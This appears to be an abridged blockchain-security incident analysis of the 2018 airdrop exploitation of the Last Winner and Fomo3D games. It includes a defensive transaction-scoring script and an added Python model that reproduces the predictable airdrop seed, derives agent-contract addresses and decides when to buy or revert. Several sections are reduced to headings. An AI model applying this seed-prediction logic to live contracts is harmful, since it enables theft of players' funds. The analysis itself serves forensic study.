Exposing An $18 Million USD Smart Contract Vulnerability

Last Winner: Quietly Launched, Inexplicably Popular

Last Winner is an Ethereum-based DApp game that launched on August 6th, 2018.

Unknown Sources of ETH Funding

According to Blockbeats, Last Winner is promoted and operated by Ant Colony Communication, a run-of-the-mill Ponzi scheme organization with a large number of active members and considerable promotional reach [1]. That alone is enough to make any industry veteran pause.

Looking At Promotion And Contract Code

Promotional articles for the Last Winner game can be found on major online forums, in media outlets, and in WeChat groups. The articles all carry similar descriptions and come with promotional invitation codes. By contrast, there is very little information in English about Last Winner.

DApp Game Airdrop Vulnerabilities

Participants in a Fomo3D-style game purchase “keys” to play. Besides the large grand prize paid to the last purchaser, each key purchase usually also gives the buyer a chance to win an airdrop award.

On chain, airdrop attacks against such games leave a recognizable pattern:

  • Transactions sent to the game contract carrying exactly 0.1 ETH (the minimum purchase that qualifies for an airdrop)
  • A large share of those transactions fail
  • Each successful transaction triggers many internal transactions
  • The internal call logic is complex and comes with the creation and self-destruction of a large number of contracts
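The four signals above are easy to turn into a per-address score. The following is an added Python example, not AnChain.AI's own detection code: it runs over constructed transaction records, and the game contract address, the sender names and the thresholds are assumptions chosen for illustration.

```python
# Added example, not AnChain.AI's detector: a per-sender score for the four signals listed
# above, run over constructed transaction records (the contract and sender names are made up).
from collections import defaultdict
from dataclasses import dataclass

WEI = 10 ** 18
GAME = "0xgame"        # stand-in for the game contract address (constructed)

@dataclass
class Tx:
    sender: str
    to: str
    value_wei: int
    success: bool
    internal_calls: int  # internal transactions the call triggered (0 when it reverted)
    creates: int         # contracts created during the call
    selfdestructs: int   # contracts self-destructed during the call

def profile(txs):
    """Aggregate the signals per sender, over transactions addressed to the game contract."""
    by_sender = defaultdict(list)
    for tx in txs:
        if tx.to == GAME:
            by_sender[tx.sender].append(tx)
    out = {}
    for sender, lst in by_sender.items():
        ok = [tx for tx in lst if tx.success]
        out[sender] = {
            "txs": len(lst),
            "share_0_1_eth": sum(tx.value_wei == WEI // 10 for tx in lst) / len(lst),
            "failure_rate": 1 - len(ok) / len(lst),
            "avg_internal": sum(tx.internal_calls for tx in ok) / len(ok) if ok else 0.0,
            "creates": sum(tx.creates for tx in lst),
            "selfdestructs": sum(tx.selfdestructs for tx in lst),
        }
    return out

def airdrop_attack_score(p) -> int:
    """0 to 4: one point per signal past a threshold (thresholds are assumptions; tune per game)."""
    return (int(p["share_0_1_eth"] >= 0.9) + int(p["failure_rate"] >= 0.5)
            + int(p["avg_internal"] >= 10) + int(p["creates"] >= 10 and p["selfdestructs"] >= 10))

def suspects(txs, min_score: int = 3):
    """Senders scoring at least min_score, highest score first, then most transactions."""
    ranked = [(s, airdrop_attack_score(p), p["txs"]) for s, p in profile(txs).items()]
    return sorted([r for r in ranked if r[1] >= min_score], key=lambda r: (-r[1], -r[2]))

def constructed_txs():
    """Constructed sample: one ordinary player, one airdrop attacker, some unrelated traffic."""
    txs = [Tx("0xplayer", GAME, WEI // 2, True, 2, 0, 0) for _ in range(5)]
    for i in range(20):                     # attacker: exactly 0.1 ETH, one attempt in four lands
        ok = i % 4 == 0
        txs.append(Tx("0xattacker", GAME, WEI // 10, ok,
                      40 if ok else 0, 30 if ok else 0, 30 if ok else 0))
    txs.append(Tx("0xattacker", "0xother", WEI, True, 1, 0, 0))   # ignored: different contract
    return txs

if __name__ == "__main__":
    for sender, score, n in suspects(constructed_txs()):
        print(f"{sender}: score {score}/4 over {n} transactions")
```

The score is deliberately coarse: on a real chain the failed-transaction and contract-creation counts come from traces, and a player who simply loses a lot of failed bids would trip only one of the four signals, which is why a suspect needs at least three.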

AnChain.AI Anomaly Detection

The suspected attacker address with the largest footprint piqued our interest: 0xae58.

Analyzing Attack Profitability

The most profitable attacker is the team behind the 0x820d address, which has accumulated more than 5,000 ETH. We have named this team BAPT-LW20 (Blockchain APT — Last Winner).

The Story Behind BAPT-LW20

We tracked the BAPT-LW20 hacker group and reconstructed its hacking timeline.

BAPT-LW20 Steals The Game’s Grand Prize

On the morning of August 17th, the first round of the Last Winner game ended. The grand prize, totaling 7,754 ETH, was won by the address 0x5167.

Who Is Behind BAPT-LW?

The 0x20C9 address was the first to successfully exploit the original Fomo3D airdrop vulnerability and collect a reward.

0x20C9 created the attack contract 0xe7ce at 10:07 on July 8th. Over the next ten minutes the contract was called three times without success; the fourth call won the reward, turning a 0.1 ETH purchase into 0.19 ETH (see below).

Why Is Last Winner So Attractive?

Shortly after the original Fomo3D launched, its airdrop vulnerability was discovered and exploited. As the game spread and its vulnerabilities were gradually made public, the techniques for attacking the airdrop grew steadily more sophisticated.

Last Winner = Hackers’ ATM!

Admissions to the first round of the Last Winner game amassed over 100,000 ETH, leaving more than 10,000 ETH continuously exposed to the airdrop vulnerability.

Who Is next?

On August 14th, BAPT-LW20's 0x820d address deployed two new versions of the attack contract, this time targeting another recently deployed DApp smart contract.

Timeline of BAPT-LW20:

  • 2018/07/06 Fomo3D game contract goes online
  • 2018/07/08 A developer from a Fomo3D competitor discovers and exploits the airdrop vulnerability
  • 2018/07/20 Fomo3D grows very popular in China
  • 2018/07/20 BAPT-LW20 hacker team becomes active
  • 2018/07/21 BAPT-LW20 team successfully exploits the Fomo3D airdrop vulnerability for the first time
  • 2018/07/23 BAPT-LW20 team attacks the copycat game Mouse RatScam
  • 2018/07/23 Péter discloses the Fomo3D airdrop vulnerability on Reddit
  • 2018/07/24 BAPT-LW20 team attacks FoMoGame
  • 2018/07/26 BAPT-LW20 team deploys a new version of the attack contract, 0x5483
  • 2018/08/06 Last Winner game goes online
  • 2018/08/07 Last Winner grows more popular
  • 2018/08/07 BAPT-LW20 team starts attacking Last Winner
  • 2018/08/09 Ethereum's unconfirmed transaction volume hits a new high for the year
  • 2018/08/10 BAPT-LW20 team moves funds out of the old contract and continues the attack with the new version
  • 2018/08/14 BAPT-LW20 team deploys a new version of the attack contract and starts attacking a new target contract
  • 2018/08/17 BAPT-LW20 team wins the Last Winner grand prize of 7,754 ETH

Technical Overview

The root cause of the Last Winner (Fomo3D-copycat) airdrop vulnerability is that unpredictable random numbers are hard to generate inside an Ethereum smart contract:

  • The random source the airdrop uses to control the probability of winning is built from block data and the caller's address, all of which a caller can obtain in advance.
  • Whether a given call will win the airdrop, and how large the bonus will be, can therefore be computed ahead of time by another contract, which then decides how to proceed.
  • The Fomo3D airdrop mechanism is meant to admit only non-contract addresses (ordinary humans). The check is flawed: it tests whether the caller's address has code (extcodesize), and that is zero while a contract is still being constructed, so the restriction can be bypassed by entering the game from the attack contract's constructor.

Attack Variable 1 — Airdrop and Mining

Miners under a PoW protocol perform one calculation over and over: vary an input, hash it, and keep the result only when it falls below the target. Predicting the airdrop is the same kind of search. Because the seed can be computed in advance, the attacker iterates over candidate caller addresses and submits a purchase only through one that is already known to win. Compared with deploying a fresh contract for every blind attempt, this:

  1. Increases the attack success rate.
  2. Reduces the number of attack contract deployments, which greatly reduces gas consumption.

Attack Variable 2 — Probability Of Winning

The hackers pre-deploy 1,000 agent contracts. Why that number?
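The following Python model is an added example, not code from the AnChain.AI write-up or from any of the contracts involved. It covers the three points of the technical overview and the agent-contract search above: it reproduces the Fomo3D airdrop seed (a keccak256 over block.timestamp, block.difficulty, block.coinbase, block.gaslimit, block.number and msg.sender, tested as seed % 1000 < airDropTracker_), derives agent addresses with the standard CREATE rule from a deployer's nonce sequence, picks the agent that wins in a given block or reverts when none does, and works out why a pool of 1,000 agents fits a modulus of 1,000. The block header, coinbase and deployer address are constructed, not taken from the chain.

```python
# Added example (not code from AnChain.AI or from any contract discussed): an off-chain
# model of the Fomo3D-style airdrop lottery and of the agent-contract search behind it.
# The block header and addresses are constructed; the seed formula is Fomo3D's own.
KECCAK_RC = [
    0x0000000000000001, 0x0000000000008082, 0x800000000000808A, 0x8000000080008000,
    0x000000000000808B, 0x0000000080000001, 0x8000000080008081, 0x8000000000008009,
    0x000000000000008A, 0x0000000000000088, 0x0000000080008009, 0x000000008000000A,
    0x000000008000808B, 0x800000000000008B, 0x8000000000008089, 0x8000000000008003,
    0x8000000000008002, 0x8000000000000080, 0x000000000000800A, 0x800000008000000A,
    0x8000000080008081, 0x8000000000008080, 0x0000000080000001, 0x8000000080008008,
]
KECCAK_ROT = [[0, 36, 3, 41, 18], [1, 44, 10, 45, 2], [62, 6, 43, 15, 61],
              [28, 55, 25, 21, 56], [27, 20, 39, 8, 14]]
M64 = (1 << 64) - 1

def keccak256(data: bytes) -> bytes:
    """Ethereum keccak256 (original Keccak pad 0x01, unlike SHA3-256's 0x06), pure Python."""
    rol = lambda v, n: ((v << n) | (v >> (64 - n))) & M64 if n else v
    rate = 136                                    # bytes absorbed per block: 1600/8 - 2*32
    msg = bytearray(data) + b"\x01"
    msg += b"\x00" * (-len(msg) % rate)
    msg[-1] |= 0x80                                # pad10*1
    A = [[0] * 5 for _ in range(5)]               # lane (x, y) holds lane index x + 5*y
    for off in range(0, len(msg), rate):
        for i in range(rate // 8):
            A[i % 5][i // 5] ^= int.from_bytes(msg[off + 8 * i:off + 8 * i + 8], "little")
        for rc in KECCAK_RC:                      # 24 rounds of Keccak-f[1600]
            C = [A[x][0] ^ A[x][1] ^ A[x][2] ^ A[x][3] ^ A[x][4] for x in range(5)]
            D = [C[(x - 1) % 5] ^ rol(C[(x + 1) % 5], 1) for x in range(5)]
            A = [[A[x][y] ^ D[x] for y in range(5)] for x in range(5)]            # theta
            B = [[0] * 5 for _ in range(5)]
            for x in range(5):
                for y in range(5):
                    B[y][(2 * x + 3 * y) % 5] = rol(A[x][y], KECCAK_ROT[x][y])   # rho, pi
            A = [[B[x][y] ^ (~B[(x + 1) % 5][y] & B[(x + 2) % 5][y])
                  for y in range(5)] for x in range(5)]                           # chi
            A[0][0] ^= rc                                                         # iota
    return b"".join(A[i % 5][i // 5].to_bytes(8, "little") for i in range(4))

def create_address(deployer: bytes, nonce: int) -> bytes:
    """Standard CREATE rule, keccak256(rlp([deployer, nonce]))[12:]: agent addresses are
    fixed by the deployer's nonce sequence, so they are known before anything is deployed."""
    if nonce == 0:
        nonce_enc = b"\x80"
    elif nonce < 0x80:
        nonce_enc = bytes([nonce])
    else:
        n = nonce.to_bytes((nonce.bit_length() + 7) // 8, "big")
        nonce_enc = bytes([0x80 + len(n)]) + n
    payload = b"\x94" + deployer + nonce_enc      # 0x80 + 20 prefixes the address string
    return keccak256(bytes([0xC0 + len(payload)]) + payload)[12:]

def airdrop_seed(block: dict, sender: bytes) -> int:
    """Fomo3D's airdrop() seed. Every term is readable by a contract in the same block."""
    ts = block["timestamp"]                       # 'now' in the Solidity source
    total = (ts + block["difficulty"]
             + int.from_bytes(keccak256(block["coinbase"]), "big") // ts
             + block["gaslimit"]
             + int.from_bytes(keccak256(sender), "big") // ts
             + block["number"])
    if total >> 256:
        raise OverflowError("SafeMath add would revert")
    return int.from_bytes(keccak256(total.to_bytes(32, "big")), "big")

def wins_airdrop(block: dict, sender: bytes, tracker: int) -> bool:
    """Fomo3D's test: seed % 1000 < airDropTracker_ (tracker +1 per >= 0.1 ETH buy, 0 after a win)."""
    return airdrop_seed(block, sender) % 1000 < tracker

def winning_agents(block: dict, deployer: bytes, n_agents: int, tracker: int) -> list:
    """Nonces of the deployer's pre-created agents (a contract's first CREATE uses
    nonce 1) whose address would win the airdrop in this block."""
    return [n for n in range(1, n_agents + 1)
            if wins_airdrop(block, create_address(deployer, n), tracker)]

def plan_attack(block: dict, deployer: bytes, n_agents: int, tracker: int):
    """What the attack contract decides inside the block: send the 0.1 ETH purchase
    through a known winner, or revert so the transaction fails having cost only gas."""
    winners = winning_agents(block, deployer, n_agents, tracker)
    return ("call", winners[0]) if winners else ("revert", None)

def p_some_agent_wins(n_agents: int, tracker: int) -> float:
    """One agent wins with p = tracker/1000; n agents give 1 - (1-p)^n. With n = 1000,
    matching the modulus, that is about 1 - e^-tracker: ~63% at tracker 1, ~95% at 3."""
    p = min(tracker, 1000) / 1000
    return 1.0 - (1.0 - p) ** n_agents

# Constructed inputs: not a real mainnet block, coinbase or deployer.
SAMPLE_BLOCK = {"number": 6_120_000, "timestamp": 1_534_000_000,
                "difficulty": 3_000_000_000_000_000, "gaslimit": 8_000_000,
                "coinbase": bytes.fromhex("11" * 20)}
DEPLOYER = bytes.fromhex("22" * 20)

if __name__ == "__main__":
    for t in range(1, 6):
        print(f"tracker={t}: one agent {t / 1000:.3f}, 1000 agents {p_some_agent_wins(1000, t):.3f}")
    print("attack contract decision:", plan_attack(SAMPLE_BLOCK, DEPLOYER, 1000, 3))
```

Two things the model makes concrete. First, nothing in the seed is secret: a contract sees the same block fields as the game does, so the "random" draw is a deterministic function of the caller's address within a block. Second, because the tracker climbs by one per qualifying purchase and a single address wins with probability tracker/1000, a pool of 1,000 distinct agent addresses turns a per-call chance of a few tenths of a percent into a near-certain win in most blocks, and the attack contract only ever spends the 0.1 ETH when it already knows the answer; when no agent wins it reverts, which is the failed-transaction pattern seen on chain.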

Attack Variable 3 — Exploiting Bugs In Airdrop Probability Calculations

Even after discovering the flaws in Fomo3D's airdrop rule, the hackers kept looking for ways to profit more efficiently.

About AnChain.AI

A blockchain data analytics firm providing intelligence, indicators, and investigative resources for clients to enhance their security, risk, and compliance strategies.

References

[1] Blockbeats: 80,000 transactions “sealed” the Ethereum network, just to snatch the Fomo3D award? https://mp.weixin.qq.com/s/5nrgj8sIZ0SlXebG5sWVPw

Acknowledgements

AnChain.AI would like to acknowledge Secbit Labs and Graphistry for supporting this investigation.
